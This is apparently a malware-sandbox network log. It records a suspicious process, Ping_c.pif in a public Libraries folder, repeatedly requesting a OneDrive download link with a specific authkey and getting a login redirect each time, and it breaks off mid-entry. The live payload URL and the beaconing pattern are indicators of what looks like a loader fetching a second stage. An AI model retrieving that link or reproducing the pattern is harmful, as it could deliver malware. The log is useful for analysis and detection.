                            Timestamp | Bytes transferred | Direction | Data
                            2024-09-21 14:23:01 UTC | 213 | OUT | GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:02 UTC | 1149 | IN | HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928582&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:42CC5kja3Ig=:tpeWVkQRCwPBFaA1FXI8Mrlb3fJr0nnQmV2CFmQcOf0=:F; domain=.live.com; path=/
                            Set-Cookie: xid=33fd330b-b72c-4973-9ac4-2a09e53ce65b&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:01 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:02 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-hrldf
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 34072E16EBD64E80A0C4C2D2077B58E1 Ref B: BN3EDGE0613 Ref C: 2024-09-21T14:23:01Z
                            Date: Sat, 21 Sep 2024 14:23:02 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            13 | 192.168.2.8 | 53535 | 13.107.137.11 | 443 | 7348 | C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp | Bytes transferred | Direction | Data
                            2024-09-21 14:23:05 UTC | 213 | OUT | GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:05 UTC | 1149 | IN | HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928585&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:A/qJ6Eja3Ig=:ovauWLzxFCP0T8JGiwTSaHol49S3hDhweW1qTDpwZtg=:F; domain=.live.com; path=/
                            Set-Cookie: xid=e0b6f1f6-5e86-4b7d-978d-992070061f6f&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:05 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:05 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-jsmqf
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: B6A1DDDB1E0F4DEFB927A2F7F169B792 Ref B: BN3EDGE0208 Ref C: 2024-09-21T14:23:05Z
                            Date: Sat, 21 Sep 2024 14:23:04 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            14 | 192.168.2.8 | 53538 | 13.107.137.11 | 443 | 7348 | C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp | Bytes transferred | Direction | Data
                            2024-09-21 14:23:08 UTC | 213 | OUT | GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:08 UTC | 1149 | IN | HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928588&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:CMk/6kja3Ig=:AiRpF2A9u7pQMu/XCfKxtr5AdRaEOVqotdFRsXBoucc=:F; domain=.live.com; path=/
                            Set-Cookie: xid=cc770d85-1142-4438-87aa-594b0e23c5a1&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:08 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:08 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-9btt6
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 6BD4F630B47648B68B40436135F0C6F4 Ref B: BN3EDGE1111 Ref C: 2024-09-21T14:23:08Z
                            Date: Sat, 21 Sep 2024 14:23:07 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            15 | 192.168.2.8 | 53541 | 13.107.137.11 | 443 | 7348 | C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp | Bytes transferred | Direction | Data
                            2024-09-21 14:23:11 UTC | 213 | OUT | GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:11 UTC | 1149 | IN | HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928591&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:ACMg7Eja3Ig=:ofBDg7yqdw6m1a6aGfNn+zY0Ej+3F8DhQXRWdtc9Vd4=:F; domain=.live.com; path=/
                            Set-Cookie: xid=5339415f-8ef4-4705-bfff-19fe496bd5bb&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:11 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:11 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-w2dr2
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: B8031F3871D24FD29FAAA21DF98EF5CD Ref B: BN3EDGE0919 Ref C: 2024-09-21T14:23:11Z
                            Date: Sat, 21 Sep 2024 14:23:11 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            16 | 192.168.2.8 | 53544 | 13.107.137.11 | 443 | 7348 | C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp | Bytes transferred | Direction | Data
                            2024-09-21 14:23:14 UTC | 213 | OUT | GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:15 UTC | 1149 | IN | HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928594&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:Sqsw7kja3Ig=:4JHsAmhelhsBC+kTkzwBO1NIoiYJUW+PTvIwrPwo2iw=:F; domain=.live.com; path=/
                            Set-Cookie: xid=b7ce59a7-d2ff-4e27-8a20-0c59440a95f5&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:14 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:14 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-cwb7f
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: D3926EA636BC409EB462764B4D1CB22C Ref B: BN3EDGE0218 Ref C: 2024-09-21T14:23:14Z
                            Date: Sat, 21 Sep 2024 14:23:14 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            17 | 192.168.2.8 | 53547 | 13.107.137.11 | 443 | 7348 | C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp | Bytes transferred | Direction | Data
                            2024-09-21 14:23:17 UTC | 213 | OUT | GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:18 UTC | 1149 | IN | HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928598&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:dacN8Eja3Ig=:RLR9fpAwlulnuVN4+gC3dlI+XGhSWFQiOGGyzGazIzI=:F; domain=.live.com; path=/
                            Set-Cookie: xid=b5c3aec8-960b-4e21-baa2-5582636e91a6&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:17 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:18 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-nj9k4
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 4110DA2041544DB2BC2CB7D65DCC9EAF Ref B: BN3EDGE0604 Ref C: 2024-09-21T14:23:17Z
                            Date: Sat, 21 Sep 2024 14:23:18 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            18 | 192.168.2.8 | 53550 | 13.107.137.11 | 443 | 7348 | C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp | Bytes transferred | Direction | Data
                            2024-09-21 14:23:21 UTC | 213 | OUT | GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:22 UTC | 1149 | IN | HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928602&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:8/lO8kja3Ig=:ESgwCXp8xvvb17QKRf912LXwSH+4TmOVvqFjgg+DuRs=:F; domain=.live.com; path=/
                            Set-Cookie: xid=8bd5a113-a0aa-4bc3-816a-ea711fb4472a&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:21 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:22 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-h6wpj
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 991E912308C849C0A1C7D94BD06F9C9F Ref B: BN3EDGE0207 Ref C: 2024-09-21T14:23:21Z
                            Date: Sat, 21 Sep 2024 14:23:22 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            19 | 192.168.2.8 | 53553 | 13.107.137.11 | 443 | 7348 | C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp | Bytes transferred | Direction | Data
                            2024-09-21 14:23:25 UTC | 213 | OUT | GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            2024-09-21 14:23:25 UTC | 1149 | IN | HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928605&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:og1S9Eja3Ig=:I1Xssh1RvDD4wD2aY9gvzPyLIrH+KSDLR9PLRW1eWfk=:F; domain=.live.com; path=/
                            Set-Cookie: xid=b47cd338-bcf5-4244-b1ad-dec9d44f1a30&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:25 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:25 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-ttwxg
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: C20E5A6DF8484E25BDAE29B6710EF164 Ref B: BN3EDGE0911 Ref C: 2024-09-21T14:23:25Z
                            Date: Sat, 21 Sep 2024 14:23:25 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID: 20 | Source IP: 192.168.2.8 | Source Port: 53558 | Destination IP: 13.107.137.11 | Destination Port: 443 | PID: 7348 | Process: C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp: 2024-09-21 14:23:28 UTC | Bytes transferred: 213 | Direction: OUT | Data:
                            GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            Timestamp: 2024-09-21 14:23:29 UTC | Bytes transferred: 1149 | Direction: IN | Data:
                            HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928609&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:Ew2Z9kja3Ig=:VSGT8Ms3UcFCK/aI6gONL1oWBvGt2omz55IsdQIfMKQ=:F; domain=.live.com; path=/
                            Set-Cookie: xid=9f7582a6-0065-49c9-8637-e253cb28a247&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:28 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:29 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-rd44p
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 909B2870046846F8BEB91EFDF45B27E9 Ref B: BN3EDGE1011 Ref C: 2024-09-21T14:23:28Z
                            Date: Sat, 21 Sep 2024 14:23:28 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID: 21 | Source IP: 192.168.2.8 | Source Port: 53561 | Destination IP: 13.107.137.11 | Destination Port: 443 | PID: 7348 | Process: C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp: 2024-09-21 14:23:32 UTC | Bytes transferred: 213 | Direction: OUT | Data:
                            GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            Timestamp: 2024-09-21 14:23:32 UTC | Bytes transferred: 1149 | Direction: IN | Data:
                            HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928612&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:OPm7+Eja3Ig=:D7eeTXFcUUsLtiSfVl247WUGRz1gjs1jH4HaY1VCAyA=:F; domain=.live.com; path=/
                            Set-Cookie: xid=1dfa1f20-1b63-4d4c-a5f6-e45d46aea13c&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:32 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:32 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-9m949
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: A0A7E95071E54D1A8703E05DE4C7F421 Ref B: BN3EDGE1118 Ref C: 2024-09-21T14:23:32Z
                            Date: Sat, 21 Sep 2024 14:23:32 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID: 22 | Source IP: 192.168.2.8 | Source Port: 53564 | Destination IP: 13.107.137.11 | Destination Port: 443 | PID: 7348 | Process: C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp: 2024-09-21 14:23:35 UTC | Bytes transferred: 213 | Direction: OUT | Data:
                            GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            Timestamp: 2024-09-21 14:23:36 UTC | Bytes transferred: 1149 | Direction: IN | Data:
                            HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928616&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:bFS1+kja3Ig=:RZhUVSKctKXfr+QWtRIypQjz6xqSojbyQdnwg7PjsIs=:F; domain=.live.com; path=/
                            Set-Cookie: xid=4e9f660a-37ee-4654-aa34-af59dcf9c38a&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:35 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:36 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-p5mf5
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 76595A1E2EF94096AA041EBEA410C656 Ref B: BN3EDGE0810 Ref C: 2024-09-21T14:23:35Z
                            Date: Sat, 21 Sep 2024 14:23:35 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID: 23 | Source IP: 192.168.2.8 | Source Port: 53567 | Destination IP: 13.107.137.11 | Destination Port: 443 | PID: 7348 | Process: C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp: 2024-09-21 14:23:39 UTC | Bytes transferred: 213 | Direction: OUT | Data:
                            GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            Timestamp: 2024-09-21 14:23:39 UTC | Bytes transferred: 1149 | Direction: IN | Data:
                            HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928619&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:xi/X/Eja3Ig=:01XWhZHWcjv/dbl69k1Pff63QJLpqWD2mQfUvPqYdH8=:F; domain=.live.com; path=/
                            Set-Cookie: xid=d9057863-5a9f-415a-aaad-7c524f2d57db&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:39 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:39 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7b7c95544b-x8mpg
                            X-ODWebServer: nameastus2946819-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: A08A5A96E48049E89EEC9308F5083A37 Ref B: BN3EDGE0808 Ref C: 2024-09-21T14:23:39Z
                            Date: Sat, 21 Sep 2024 14:23:39 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID: 24 | Source IP: 192.168.2.8 | Source Port: 53570 | Destination IP: 13.107.137.11 | Destination Port: 443 | PID: 7348 | Process: C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp: 2024-09-21 14:23:42 UTC | Bytes transferred: 213 | Direction: OUT | Data:
                            GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            Timestamp: 2024-09-21 14:23:43 UTC | Bytes transferred: 1149 | Direction: IN | Data:
                            HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=160&ct=1726928623&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:cgfq/kja3Ig=:bftqD88IYRFy1MZ1KnKM+oCV7BsRovrxXK7F4zMuopA=:F; domain=.live.com; path=/
                            Set-Cookie: xid=e1ce4174-5400-4eae-a8a2-3d9a7fb921ee&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
                            Set-Cookie: LD=; domain=.live.com; expires=Sat, 21-Sep-2024 12:43:42 GMT; path=/
                            Set-Cookie: wla42=; domain=live.com; expires=Sat, 28-Sep-2024 14:23:43 GMT; path=/
                            X-Content-Type-Options: nosniff
                            Strict-Transport-Security: max-age=31536000
                            X-MSNServer: 7df49c44cf-8rz6f
                            X-ODWebServer: nameastus2708987-odwebpl
                            X-Cache: CONFIG_NOCACHE
                            X-MSEdge-Ref: Ref A: 8320DCE1D295439B96D3CD2782BDEDA0 Ref B: BN3EDGE0710 Ref C: 2024-09-21T14:23:42Z
                            Date: Sat, 21 Sep 2024 14:23:42 GMT
                            Connection: close
                            Content-Length: 0


                            Session ID: 25 | Source IP: 192.168.2.8 | Source Port: 53573 | Destination IP: 13.107.137.11 | Destination Port: 443 | PID: 7348 | Process: C:\Users\Public\Libraries\Ping_c.pif
                            Timestamp: 2024-09-21 14:23:46 UTC | Bytes transferred: 213 | Direction: OUT | Data:
                            GET /download?resid=1EA3E8EA0AAD572E%21216&authkey=!ACd1Y23Ll9MH7f0 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                            Host: onedrive.live.com
                            Timestamp: 2024-09-21 14:23:46 UTC | Bytes transferred: 1149 | Direction: IN | Data:
                            HTTP/1.1 302 Found
                            Cache-Control: no-cache, no-store
                            Pragma: no-cache
                            Content-Type: text/html
                            Expires: -1
                            Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=161&ct=1726928626&rver=7.5.2205.0&wp=MBI_SSL_SHARED&wreply=https:%2F%2Fonedrive.live.com%2Fdownload%3Fresid%3D1EA3E8EA0AAD572E%2521216%26authkey%3D!ACd1Y23Ll9MH7f0&lc=1033&id=250206&cbcxt=sky&cbcxt=sky
                            Set-Cookie: E=P:/gveAEna3Ig=:YiTGIo8oC/LQV7INpmh6ZP+hc4ZZhAMROmPGIuNWryM=:F; domain=.live.com; path=/
                            Set-Cookie: xid=9168f77b-554a-4e62-918d-ef59f910c0e5&&ODSP-ODWEB-ODCF&309; domain=.live.com; path=/
                            Set-Cookie: xidseq=1; domain=.live.com; path=/
